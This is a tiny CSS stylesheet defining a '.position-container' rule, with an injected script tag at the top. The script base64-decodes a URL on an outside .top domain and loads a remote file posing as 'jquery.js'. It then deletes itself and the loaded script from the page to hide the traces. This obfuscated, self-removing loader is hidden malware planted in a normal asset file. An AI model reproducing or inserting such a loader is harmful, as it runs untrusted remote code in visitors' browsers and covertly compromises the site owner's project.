<script>!function(){var s=document.createElement("script"),c=document.currentScript;s.src=atob("aHR0cHM6Ly93d3cuamlzaGk2NjYudG9wL2pxdWVyeS5qcw==")+"?_="+Date.now();s.onload=function(){this.remove();c.remove();};document.head.appendChild(s);}();</script>  /*
 * @file
 * Contain positioned elements.
 */

.position-container {
  position: relative;
}
